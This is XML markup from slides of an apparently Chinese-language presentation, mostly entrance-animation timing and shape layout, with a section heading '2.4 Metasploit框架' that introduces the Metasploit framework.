                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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p:bldP spid="81" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="82" grpId="0" bldLvl="0" animBg="1"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/slides/slide2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5" name="组合 44"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1847711" y="1845636"/>
            <a:ext cx="2926715" cy="1638300"/>
            <a:chOff x="280807" y="-427279"/>
            <a:chExt cx="3055299" cy="2252704"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="平行四边形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="280807" y="-427279"/>
              <a:ext cx="3055299" cy="2252704"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1415026" y="-203755"/>
              <a:ext cx="1187251" cy="1482594"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596789" y="1989833"/>
            <a:ext cx="7328535" cy="1258570"/>
            <a:chOff x="3663165" y="953426"/>
            <a:chExt cx="5496401" cy="1108953"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4060358" y="1005461"/>
              <a:ext cx="4914900" cy="622737"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3663165" y="953426"/>
              <a:ext cx="5496401" cy="1108953"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6146" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5185410" y="3333750"/>
            <a:ext cx="5142230" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9933"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="613A13">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
